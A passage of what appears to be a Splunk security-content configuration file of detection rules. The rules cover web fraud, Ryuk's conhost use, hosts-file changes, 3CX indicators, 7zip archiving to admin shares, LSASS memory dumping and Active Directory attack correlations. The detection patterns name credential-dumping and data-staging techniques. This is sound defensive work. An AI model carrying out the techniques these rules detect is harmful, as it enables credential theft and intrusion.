-10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Anomalous User Clickspeed - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* | rex field=cookie "form_key=(?\w+)" | streamstats window=2 current=1 range(_time) as TimeDelta by session_id | where TimeDelta>0 |stats count stdev(TimeDelta) as ClickSpeedStdDev avg(TimeDelta) as ClickSpeedAvg by session_id | where count>5 AND (ClickSpeedStdDev<.5 OR ClickSpeedAvg<.5) | `web_fraud___anomalous_user_clickspeed_filter` [ESCU - Web Fraud - Password Sharing Across Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to identify user accounts that share a common password. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is used to identify user accounts that share a common password. action.escu.how_to_implement = We need to start with a dataset that allows us to see the values of usernames and passwords that users are submitting to the website hosting the Magento2 e-commerce platform (commonly found in the HTTP form_data field). A tokenized or hashed value of a password is acceptable and certainly preferable to a clear-text password. Common data sources used for this detection are customized Apache logs, customized IIS, and Splunk Stream. action.escu.known_false_positives = As is common with many fraud-related searches, we are usually looking to attribute risk or synthesize relevant context with loosely written detections that simply detect anamoluous behavior. action.escu.creation_date = 2018-10-08 action.escu.modification_date = 2018-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Web Fraud - Password Sharing Across Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Web Fraud Detection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Web Fraud - Password Sharing Across Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Web Fraud Detection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `stream_http` http_content_type=text* uri=/magento2/customer/account/loginPost* | rex field=form_data "login\[username\]=(?[^&|^$]+)" | rex field=form_data "login\[password\]=(?[^&|^$]+)" | stats dc(Username) as UniqueUsernames values(Username) as user list(src_ip) as src_ip by Password|where UniqueUsernames>5 | `web_fraud___password_sharing_across_accounts_filter` [ESCU - Windows connhost exe started forcefully - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for the Console Window Host process (connhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED This event is actually seen in the windows 10 client of attack_range_local. After further testing we realized this is not specific to Ryuk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for the Console Window Host process (connhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED This event is actually seen in the windows 10 client of attack_range_local. After further testing we realized this is not specific to Ryuk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This process should not be ran forcefully, we have not see any false positives for this detection action.escu.creation_date = 2020-11-06 action.escu.modification_date = 2020-11-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows connhost exe started forcefully - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ryuk Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Windows connhost exe started forcefully - Rule action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for the Console Window Host process (connhost.exe) executed using the force flag -ForceV1. This is not regular behavior in the Windows OS and is often seen executed by the Ryuk Ransomware. DEPRECATED This event is actually seen in the windows 10 client of attack_range_local. After further testing we realized this is not specific to Ryuk. action.notable.param.rule_title = Windows connhost exe started forcefully action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe* 0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_connhost_exe_started_forcefully_filter` [ESCU - Windows hosts file modification - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for modifications to the hosts file on all Windows endpoints across your environment. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for modifications to the hosts file on all Windows endpoints across your environment. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes. action.escu.known_false_positives = There may be legitimate reasons for system administrators to add entries to this file. action.escu.creation_date = 2018-11-02 action.escu.modification_date = 2018-11-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows hosts file modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Host Redirection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Windows hosts file modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Host Redirection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for modifications to the hosts file on all Windows endpoints across your environment. action.notable.param.rule_title = Windows hosts file modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.file_path Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | search Filesystem.file_name=hosts AND Filesystem.file_path=*Windows\\System32\\* | `drop_dm_object_name(Filesystem)` | `windows_hosts_file_modification_filter` [ESCU - 3CX Supply Chain Attack Network Indicators - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information into the `Network Resolution` datamodel in the `DNS` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA''s are installed. action.escu.known_false_positives = False positives will be present for accessing the 3cx[.]com website. Remove from the lookup as needed. action.escu.creation_date = 2023-03-30 action.escu.modification_date = 2023-03-30 action.escu.confidence = high action.escu.full_search_name = ESCU - 3CX Supply Chain Attack Network Indicators - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["3CX Supply Chain Attack"] action.risk = 1 action.risk.param._risk_message = Indicators related to 3CX supply chain attack have been identified on $src$. action.risk.param._risk = [{"risk_object_field": "src", "risk_object_type": "system", "risk_score": 100}, {"threat_object_field": "query", "threat_object_type": "url"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - 3CX Supply Chain Attack Network Indicators - Rule action.correlationsearch.annotations = {"analytic_story": ["3CX Supply Chain Attack"], "cis20": ["CIS 13"], "confidence": 100, "cve": ["CVE-2023-29059"], "impact": 100, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises. action.notable.param.rule_title = 3CX Supply Chain Attack Network Indicators action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name(DNS)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup 3cx_ioc_domains domain as query OUTPUT Description isIOC | search isIOC=true | `3cx_supply_chain_attack_network_indicators_filter` [ESCU - 7zip CommandLine To SMB Share Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious 7z process with commandline pointing to SMB network share. This technique was seen in CONTI LEAK tools where it use 7z to archive a sensitive files and place it in network share tmp folder. This search is a good hunting query that may give analyst a hint why specific user try to archive a file pointing to SMB user which is un usual. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious 7z process with commandline pointing to SMB network share. This technique was seen in CONTI LEAK tools where it use 7z to archive a sensitive files and place it in network share tmp folder. This search is a good hunting query that may give analyst a hint why specific user try to archive a file pointing to SMB user which is un usual. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-17 action.escu.modification_date = 2021-08-17 action.escu.confidence = high action.escu.full_search_name = ESCU - 7zip CommandLine To SMB Share Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - 7zip CommandLine To SMB Share Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name ="7z.exe" OR Processes.process_name = "7za.exe" OR Processes.original_file_name = "7z.exe" OR Processes.original_file_name = "7za.exe") AND (Processes.process="*\\C$\\*" OR Processes.process="*\\Admin$\\*" OR Processes.process="*\\IPC$\\*") by Processes.original_file_name Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.parent_process_id Processes.process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `7zip_commandline_to_smb_share_path_filter` [ESCU - Access LSASS Memory for Dump Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. action.escu.how_to_implement = This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 10 for lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Access LSASS Memory for Dump Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["CISA AA23-347A", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = process $SourceImage$ injected into $TargetImage$ and was attempted dump LSASS on $dest$. Adversaries tend to do this when trying to accesss credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Access LSASS Memory for Dump Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the dumping of the LSASS process memory, which occurs during credential dumping attacks.The detection is made by using Sysmon logs, specifically EventCode 10, which is related to lsass.exe. This helps to search for indicators of LSASS memory dumping such as specific call traces to dbgcore.dll and dbghelp.dll. This detection is important because it prevents credential dumping attacks and the theft of sensitive information such as login credentials, which can be used to gain unauthorized access to systems and data. False positives might occur due to legitimate administrative tasks. Next steps include reviewing and investigating each case, given the high risk associated with potential credential dumping attacks. action.notable.param.rule_title = Access LSASS Memory for Dump Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 TargetImage=*lsass.exe CallTrace=*dbgcore.dll* OR CallTrace=*dbghelp.dll* | stats count min(_time) as firstTime max(_time) as lastTime by dest, TargetImage, TargetProcessId, SourceImage, SourceProcessId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `access_lsass_memory_for_dump_creation_filter` [ESCU - Account Discovery With Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Admin or power user may used this series of command. action.escu.creation_date = 2023-01-04 action.escu.modification_date = 2023-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Account Discovery With Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "IcedID"] action.risk = 1 action.risk.param._risk_message = Suspicious $process_name$ usage detected on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 5}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Account Discovery With Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a potential account discovery series of command used by several malware or attack to recon the target machine. This technique is also seen in some note worthy malware like trickbot where it runs a cmd process, or even drop its module that will execute the said series of net command. This series of command are good correlation search and indicator of attacker recon if seen in the machines within a none technical user or department (HR, finance, ceo and etc) network. action.notable.param.rule_title = Account Discovery With Net App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND (Processes.process="* user *" OR Processes.process="*config*" OR Processes.process="*view /all*") by Processes.process_name Processes.dest Processes.user Processes.parent_process_name | where count >=4 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `account_discovery_with_net_app_filter` [ESCU - Active Directory Lateral Movement Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to your environment. In our testing, a count of 4 or 5 was decent in a lab, but the number may need to be increased as the analytic story includes over 30 analytics. In addition, based on false positives, modify any analytics to be anomaly and lower or increase risk based on organization importance. action.escu.known_false_positives = False positives will most likely be present based on risk scoring and how the organization handles system to system communication. Filter, or modify as needed. In addition to count by analytics, adding a risk score may be useful. In our testing, with 22 events over 30 days, the risk scores ranged from 500 to 80,000. Your organization will be different, monitor and modify as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Directory Lateral Movement Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Active Directory Lateral Movement Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The primary objective of this correlation rule is to detect and alert on potential lateral movement activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Lateral Movement analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Lateral Movement analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.notable.param.rule_title = RBA: Active Directory Lateral Movement Identified action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Active Directory Lateral Movement" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 4 | `active_directory_lateral_movement_identified_filter` [ESCU - Active Directory Privilege Escalation Identified - Rule] action.escu = 0 action.escu.enabled = 1 description = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a predetermined threshold of correlated analytics is reached within the specified time frame. This threshold can be customized to suit the needs and risk appetite of the organization. action.escu.how_to_implement = Splunk Enterprise Security is required to utilize this correlation. In addition, modify the source_count value to your environment. In our testing, a count of 4 or 5 was decent in a lab, but the number may need to be increased as the analytic story includes over 30 analytics. In addition, based on false positives, modify any analytics to be anomaly and lower or increase risk based on organization importance. action.escu.known_false_positives = False positives will most likely be present based on risk scoring and how the organization handles system to system communication. Filter, or modify as needed. In addition to count by analytics, adding a risk score may be useful. In our testing, with 22 events over 30 days, the risk scores ranged from 500 to 80,000. Your organization will be different, monitor and modify as needed. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Active Directory Privilege Escalation Identified - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Active Directory Privilege Escalation Identified - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The primary objective of this correlation rule is to detect and alert on potential privilege escalation activities within an organization's Active Directory (AD) environment. By identifying multiple analytics associated with the Active Directory Privilege Escalation analytic story, security analysts can gain better insight into possible threats and respond accordingly to mitigate risks. The correlation rule will trigger an alert when multiple analytics from the Active Directory Privilege Escalation analytic story are detected within a specified time frame. The rule will generate an alert if a 